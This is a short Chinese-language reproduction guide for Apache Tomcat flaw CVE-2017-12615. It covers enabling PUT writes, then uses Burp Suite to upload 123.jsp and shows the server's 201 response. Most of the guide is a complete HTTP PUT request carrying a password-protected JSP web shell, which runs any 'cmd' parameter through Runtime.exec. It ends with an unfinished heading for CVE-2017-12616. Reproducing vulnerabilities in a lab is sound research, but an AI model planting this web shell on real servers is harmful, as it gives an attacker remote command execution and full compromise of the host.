tomcat缺陷重現

1、CVE-2017-12615

參照：http://blog.csdn.net/qq1124794084/article/details/78044756

復現方法：

一、下載tomcat 7.0.21

二、修改conf/web/xml文件添加readonly爲false

  <init-param>
            <param-name>readonly</param-name>
            <param-value>false</param-value>
  </init-param>

三、啓動tomcat

四、打開軟件Burp Suite Free Edition v1.7.27

五、在Burp Suite Free軟件的Repeater標籤欄輸入以下內容（備註：IP和端口爲tomcat運行的服務器的IP以及端口）：

PUT /123.jsp/ HTTP/1.1 Host: 10.20.129.14:8080 User-Agent:  JNTASS DNT:1 Connection: close Content-Length: 660

<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp +"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>

六、單擊Go

七、在彈出框中輸入tomcat運行的服務器的IP以及tomcat的web端口

九、單擊Go

十、Response以下：

HTTP/1.1 201 Created
Server: Apache-Coyote/1.1
Content-Length: 0
Date: Tue, 26 Sep 2017 07:07:31 GMT
Connection: close

十一、查看tomcat安裝目錄的webapps/ROOT目錄下可以看見123.jsp文件

 

 

 

 

2、CVE-2017-12616

server.xml文件VirtualDirContext